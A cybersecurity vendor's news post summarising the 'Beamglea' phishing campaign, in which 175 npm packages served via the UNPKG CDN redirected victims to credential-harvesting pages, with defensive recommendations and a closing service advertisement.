A sweeping phishing operation has been uncovered, in which cybercriminals exploited 175 malicious npm packages—downloaded over 26,000 times—as a covert infrastructure for credential harvesting, targeting more than 135 organizations in the technology, energy, and industrial sectors. The campaign, dubbed "Beamglea," demonstrates a disturbing trend: attackers abusing trusted software supply chains to scale up sophisticated phishing attacks.

Key Takeaways

• 175 malicious npm packages identified, with over 26,000 downloads.

• Campaign targeted over 135 companies in tech, industrial, and energy sectors.

• Attackers leveraged npm and the UNPKG CDN as free, trusted infrastructure for redirects to phishing pages.

• No malicious code executed on installation; phishing occurred through specially crafted HTML files distributed to victims.

How The Attack Worked

Cybersecurity analysts revealed that the attackers used automated Python-based tools to generate npm packages named in a random sequence, making unintentional installation by developers unlikely. Upon publication, these packages were hosted on public registries and served via the UNPKG content delivery network.

The core strategy did not involve running malicious code during package installation. Instead, attackers delivered convincing HTML files—presented as business documents like purchase orders or technical specifications—to victim organizations, likely via phishing emails. When these files were opened, JavaScript loaded from UNPKG would redirect the browser to phishing pages designed to steal credentials. The victim’s email address, embedded in the redirect, was used to prefill login forms, greatly increasing the likelihood of theft.

Targets And Technical Details

The campaign primarily targeted organizations in Western Europe, focusing on Germany, the Netherlands, Belgium, and Italy. Key industries affected included:

• Industrial manufacturing (35% of identified victims)

• Technology and electronics (20%)

• Energy and chemicals (15%)

Attackers registered at least seven phishing domains as part of the infrastructure, leveraging techniques like base64-encoded parameters to evade detection. Many of the leading phishing pages mimicked Microsoft login portals, targeting Office 365 accounts—particularly those without multi-factor authentication enabled.

Defensive Measures And Recommendations

Security experts recommend strong action in the face of this threat:

1. Force password resets for any potentially compromised accounts.

2. Enable multi-factor authentication (MFA) across all corporate and cloud systems.

3. Review email gateway logs for suspicious HTML file attachments sent during the campaign period.

4. Monitor network requests for connections to suspicious UNPKG npm patterns and flagged phishing domains.

5. Quarantine or block standalone HTML attachments delivered via email.

Adopting a zero-trust approach to third-party package usage and enhancing detection rules around open-source registries and content delivery networks is strongly advised. As attackers continue to co-opt legitimate infrastructure, organizations must remain vigilant with continuous monitoring and evolving defensive measures.

The Broader Supply Chain Risk

The Beamglea campaign underscores how supply chain ecosystems like npm can be weaponized as unwitting infrastructure for complex social engineering attacks. While the packages themselves lay dormant in terms of malicious functionality, their use to deliver phishing payloads via legitimate channels sets a worrying precedent for future cyber threats.

Staying ahead of such evolving tactics requires proactive defense strategies, improved awareness, and ongoing collaboration between software suppliers, security professionals, and the wider development community.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

• 175 Malicious npm Packages with 26,000 Downloads Used in Credential Phishing Campaign, The Hacker News.

• Global Cyberattacks Using 175 Malicious npm Packages and 26,000 Downloads Against Technology and EnergyCompanies, Cyber Press.

• 175 Malicious npm Packages Targeting Tech and Energy Firms, 26,000 Downloads, GBHackers News.